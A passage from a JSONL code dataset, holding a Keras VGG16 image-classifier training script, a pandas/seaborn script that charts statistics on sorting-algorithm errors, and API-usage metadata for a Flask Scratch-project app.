"name"}, {"api_name": "werkzeug.exceptions.NotFound", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 240, "usage_type": "call"}, {"api_name": "lib.scrape.get_default_studio_stats", "line_number": 247, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 247, "usage_type": "name"}, {"api_name": "lib.authentication.admin_required", "line_number": 251, "usage_type": "name"}, {"api_name": "lib.authentication.admin_required", "line_number": 257, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 266, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 266, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 267, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 267, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 267, "usage_type": "name"}, {"api_name": "lib.certificate.generate_certs.delay", "line_number": 268, "usage_type": "call"}, {"api_name": "lib.certificate.generate_certs", "line_number": 268, "usage_type": "attribute"}, {"api_name": "lib.certificate", "line_number": 268, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 270, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 264, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 280, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 280, "usage_type": "name"}, {"api_name": "lib.common.md", "line_number": 282, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 282, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 284, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 290, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 293, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 293, "usage_type": "name"}, {"api_name": "ccl_scratch_tools.Scraper", "line_number": 295, "usage_type": "call"}, {"api_name": "lib.scrape.add_project", "line_number": 302, "usage_type": "call"}, {"api_name": 
"lib.settings.CACHE_DIRECTORY", "line_number": 302, "usage_type": "argument"}, {"api_name": "lib.scrape", "line_number": 302, "usage_type": "name"}, {"api_name": "flask.request.cookies", "line_number": 309, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 309, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 309, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 310, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 310, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 312, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 312, "usage_type": "name"}, {"api_name": "lib.scrape.ProjectReflection", "line_number": 313, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 313, "usage_type": "name"}, {"api_name": "flask.request.cookies.get", "line_number": 315, "usage_type": "call"}, {"api_name": "flask.request.cookies", "line_number": 315, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 315, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 316, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 316, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 317, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 317, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 329, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 329, "usage_type": "name"}, {"api_name": "lib.scrape.ProjectReflection.objects", "line_number": 330, "usage_type": "call"}, {"api_name": "lib.scrape.ProjectReflection", "line_number": 330, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 330, "usage_type": "name"}, {"api_name": "lib.scrape.set_reload_page", "line_number": 344, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 344, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 345, "usage_type": "call"}, {"api_name": "lib.display.get_project_page", "line_number": 353, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 353, "usage_type": "argument"}, {"api_name": "lib.display", "line_number": 353, "usage_type": "name"}, {"api_name": "lib.settings.PROJECT_CACHE_LENGTH", "line_number": 349, "usage_type": "name"}, {"api_name": "lib.scrape.get_reload_project", "line_number": 350, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 350, "usage_type": "name"}, {"api_name": "lib.authentication.session_active", "line_number": 351, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 351, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 364, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 364, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 365, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 365, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 366, "usage_type": "call"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 367, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 367, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 367, "usage_type": "name"}, {"api_name": "ccl_scratch_tools.Scraper", "line_number": 369, "usage_type": "call"}, {"api_name": 
"flask.request.form", "line_number": 370, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 370, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 373, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 373, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 374, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 374, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 376, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 376, "usage_type": "name"}, {"api_name": "lib.scrape.rescrape_all.delay", "line_number": 377, "usage_type": "call"}, {"api_name": "lib.scrape.rescrape_all", "line_number": 377, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 377, "usage_type": "name"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 377, "usage_type": "name"}, {"api_name": "lib.scrape.add_studio.delay", "line_number": 380, "usage_type": "call"}, {"api_name": "lib.scrape.add_studio", "line_number": 380, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 380, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 382, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 382, "usage_type": "name"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 383, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 384, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 386, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 362, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 396, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 396, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 397, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 397, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 397, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 406, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 406, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 407, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 407, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 408, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 408, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 409, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 409, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 410, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 410, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 411, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 411, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 412, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 412, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 413, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 413, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 419, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 419, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 419, "usage_type": 
"name"}, {"api_name": "flask.Response", "line_number": 431, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 437, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 439, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 439, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 440, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 440, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 440, "usage_type": "name"}, {"api_name": "lib.authentication.session_active", "line_number": 443, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 443, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 444, "usage_type": "call"}, {"api_name": "lib.scrape.Project.objects", "line_number": 446, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 446, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 446, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 458, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 467, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 467, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 468, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 468, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 471, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 471, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 472, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 472, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 472, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 478, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 478, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 478, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 487, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 496, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 496, "usage_type": "name"}, {"api_name": "lib.scrape.Studio.objects", "line_number": 497, "usage_type": "call"}, {"api_name": "lib.scrape.Studio", "line_number": 497, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 497, "usage_type": "name"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 506, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 506, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 506, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 528, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 494, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 494, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 535, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 535, "usage_type": "name"}, {"api_name": "lib.settings.PROJECT_DIRECTORY", "line_number": 536, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 537, "usage_type": "call"}, {"api_name": "lib.common.md", "line_number": 540, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 540, 
"usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 542, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 544, "usage_type": "argument"}, {"api_name": "flask.Response", "line_number": 545, "usage_type": "call"}, {"api_name": "lib.settings.PROJECT_DIRECTORY", "line_number": 552, "usage_type": "argument"}, {"api_name": "lib.summary.generate_summary_page.delay", "line_number": 561, "usage_type": "call"}, {"api_name": "lib.summary.generate_summary_page", "line_number": 561, "usage_type": "attribute"}, {"api_name": "lib.summary", "line_number": 561, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 562, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 559, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 569, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 567, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 567, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 575, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 573, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 573, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 581, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 579, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 579, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 587, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 585, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 585, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 593, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 591, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 591, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 600, "usage_type": "call"}, {"api_name": "lib.authentication.session_active", "line_number": 598, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 598, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 606, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 606, "usage_type": "name"}, {"api_name": "lib.settings.REDIRECT_PAGES", "line_number": 606, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 607, "usage_type": "call"}, {"api_name": "lib.settings.REDIRECT_PAGES", "line_number": 607, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 607, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 607, "usage_type": "name"}, {"api_name": "lib.errors.add_error", "line_number": 610, "usage_type": "call"}, {"api_name": "lib.errors", "line_number": 610, "usage_type": "name"}, {"api_name": "flask.request.url", "line_number": 611, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 611, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 612, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 615, "usage_type": "argument"}, {"api_name": "werkzeug.exceptions.InternalServerError", "line_number": 616, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 620, "usage_type": 
"call"}, {"api_name": "werkzeug.exceptions.default_exceptions", "line_number": 624, "usage_type": "name"}]}
+{"seq_id": "333863785", "text": "from keras.applications.vgg16 import VGG16\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.layers import Input, Flatten, Dense\nfrom keras.models import Model\nfrom keras.optimizers import SGD\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom tqdm import tqdm\n\nimageX = 100\nimageY = 100\n\ndef loadData(dir):\n lines = open(dir).read().split('\\n')[:-1]\n X = []\n Y = []\n for line in tqdm(lines):\n try:\n x, y = line.split('|')\n x = load_img(x, target_size=(imageX, imageY))\n x = img_to_array(x)\n yoh = [0, 0]\n yoh[int(y)]=1\n Y.append(yoh)\n X.append(x)\n except:\n print('missed image')\n\n X = np.array(X)\n Y = np.array(Y)\n X = preprocess_input(X)\n print(X.shape, Y.shape)\n\n return X, Y\n\ndef train():\n vgg = VGG16(include_top = False, classes=2, input_shape=(imageX, imageY, 3))\n\n input = Input(shape=(imageX, imageY, 3), name = 'image_input')\n\n vgg = vgg(input)\n\n x = Flatten(name='flatten')(vgg)\n x = Dense(2, activation='softmax', name='predictions')(x)\n\n vgg = Model(input=input, output=x)\n\n vgg.summary()\n\n sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)\n vgg.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n tb = TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True)\n\n X, Y = loadData(\"clean\")\n X /= 255\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\n\n batch_size = 32\n nb_epoch = 1000\n\n filepath=\"weights-improvement-{epoch:02d}.hdf5\"\n\n cp = ModelCheckpoint('model-{epoch:03d}.h5', verbose=1, monitor='val_acc',save_best_only=True, mode='auto')\n\n print('training ========================================================================================')\n\n vgg.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=nb_epoch,\n validation_data=[X_test, y_test],\n shuffle=True,\n callbacks=[tb, cp])\n\ntrain()\n", "sub_path": "vgg/src/scratch.py", "file_name": "scratch.py", "file_ext": "py", "file_size_in_byte": 2214, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tqdm.tqdm", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.preprocess_input", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.VGG16", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.callbacks.TensorBoard", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "399779381", "text": "#imports\nimport os\n\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\n\nimport numpy as np\nimport pandas as pd\n\nimport seaborn as sns\nplt.style.use('seaborn-whitegrid')\n\nimport util_graficos as graf\n\n# %matplotlib inline\n\n# ========================================================\n# estilos de graficos :\n# >> https://tonysyu.github.io/raw_content/matplotlib-style-gallery/gallery.html\n# ========================================================\n# plt.style.use('seaborn-whitegrid')\n# plt.style.use('seaborn-pastel')\n# plt.style.use('seaborn-colorblind')\n# plt.style.use('seaborn-bright')\n# plt.style.use('grayscale')\n# plt.style.use('ggplot')\n# plt.style.use('fivethirtyeight')\n# plt.style.use('dark_background')\n# plt.style.use('classic')\n# plt.style.use('bmh')\n\n\n\npasta_origem = '../data/data_grouped'\narq_metadata = open('%s/_metadata.csv' % (pasta_origem), 'w+')\n\nprobs = ['0.01','0.02','0.05','0.001','0.0001']\n# probs = ['0.01']#,'0.02']#,'0.05','0.001','0.0001']\n\nsizes = ['100','1000','10000']\n\ndf_tudo = pd.DataFrame()\n\n#le os arquivos de entrada\nfor prob in probs:\n for size in sizes:\n filtro_arq = '%s_%s_' % (prob, size)\n\n arqs_in = os.listdir(pasta_origem)\n for f in arqs_in:\n if (f.startswith(filtro_arq)):\n print(f)\n csv = os.path.join(pasta_origem, f)\n df_temp = pd.read_csv(delimiter = ';', filepath_or_buffer = csv)\n df_tudo = df_tudo.append(df_temp)\n\n#ordena os registros por algoritmo\ndf_tudo.sort_values(by=['size_of_array','algoritmo'], inplace=True, ascending=[True,True])\n\n\n# gera os graficos\nrows = 5\ncols = 2\n\nlarg_fig = 32\nalt_fig = 41\nfont_size = 15\n\nsns_palette = 'Set2'\ncolor_map = sns.color_palette(sns_palette, n_colors=4)\n\ngerar_graficos = True\ngerar_csvs_com_dados_dos_graficos = True\n\ndf_dados_csv = pd.DataFrame()\n\nfor prob in probs:\n data = df_tudo[df_tudo.probabilidade_erro == float(prob)]\n\n group_by = ['probabilidade_erro', 'algoritmo']\n df_means = data.groupby(group_by).mean()\n df_std = data.groupby(group_by).std()\n df_min = data.groupby(group_by).min()\n df_max = data.groupby(group_by).max()\n\n # colunas_join = ['largest_sorted_subarray','k_unordered_sequence','percentual_k_unordered','percentual_maior_array']\n colunas_join = ['percentual_k_unordered','percentual_maior_array']\n df_dados_csv = df_means[colunas_join]\n df_dados_csv = df_dados_csv.join(other=df_std[colunas_join], rsuffix='_std')\n df_dados_csv = df_dados_csv.join(other=df_min[colunas_join], rsuffix='_min')\n df_dados_csv = df_dados_csv.join(other=df_max[colunas_join], rsuffix='_max', lsuffix='_mean')\n\n indx = 1\n\n #se tiver dados no DF\n if (data.shape[0] > 0):\n # print(data.head())\n\n file_title = 'Estatisticas_por_Algoritmo_Juntando_os_Tamanhos_Prob_%s' % (prob)\n\n if (gerar_csvs_com_dados_dos_graficos):\n df_dados_csv.to_csv('graficos/comparacao_entre_algoritmos/csv/%s.csv' % (file_title))\n\n if (gerar_graficos):\n graf_title = 'Estatísticas por Algoritmo Juntando Todos os Tamanhos - Probabilidade de Erro %s' % (prob)\n\n fig = plt.figure(figsize=[larg_fig, alt_fig])\n plt.suptitle(graf_title + '\\nBarplot / Média / Desvio Padrão / Mín. 
/ Máx.', fontsize=30)\n plt.rcParams.update({'font.size': font_size})\n\n #grafico de barras para % Desordenados\n ax = plt.subplot(rows, cols, indx)\n graf.gerarBarplot(ax=ax, x='probabilidade_erro',\n y='percentual_k_unordered',\n hue='algoritmo',\n data=data,\n title='% Desordenados',\n palette=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_k_unordered'] )\n indx += 1\n\n #grafico de barras para % Maior Array\n ax = plt.subplot(rows, cols, indx)\n graf.gerarBarplot(ax=ax, x='probabilidade_erro',\n y='percentual_maior_array',\n hue='algoritmo',\n data=data,\n title='% Maior Array',\n palette=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a média das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Média - percentual_k_unordered')\n data_graf = df_means['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a média das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Média - percentual_maior_array')\n data_graf = df_means['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_means['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Desvio P. - percentual_k_unordered')\n data_graf = df_std['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_std['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Desvio P. - percentual_maior_array')\n data_graf = df_std['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_std['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Mín. - percentual_k_unordered')\n data_graf = df_min['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_min['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Mín. - percentual_maior_array')\n data_graf = df_min['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_min['percentual_maior_array'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Desordenados\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Máx. - percentual_k_unordered')\n data_graf = df_max['percentual_k_unordered'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_max['percentual_k_unordered'].values)\n indx += 1\n\n # grafico de barras para a std_dev das % Maior Array\n ax = plt.subplot(rows, cols, indx)\n plt.ylabel('Máx. 
- percentual_maior_array')\n data_graf = df_max['percentual_maior_array'].unstack()\n data_graf.plot(kind='bar', ax=ax, color=color_map)\n graf.inserirValoresNasBarras(ax, df_max['percentual_maior_array'].values)\n indx += 1\n\n #salva o gráfico\n plt.savefig('graficos/comparacao_entre_algoritmos/%s.png' % (file_title), bbox_inches='tight', pad_inches=2) # , format='png', orientation='landscape', papertype='letter')\n", "sub_path": "_fabiano/python/03-Medias_por_algoritmo_e_prob_erro_juntando_todos_tamanhos.py", "file_name": "03-Medias_por_algoritmo_e_prob_erro_juntando_todos_tamanhos.py", "file_ext": "py", "file_size_in_byte": 7915, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "seaborn.color_palette", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "util_graficos.gerarBarplot", "line_number": 113, "usage_type": "call"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "util_graficos.gerarBarplot", "line_number": 124, "usage_type": "call"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": 
"util_graficos.inserirValoresNasBarras", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 183, "usage_type": 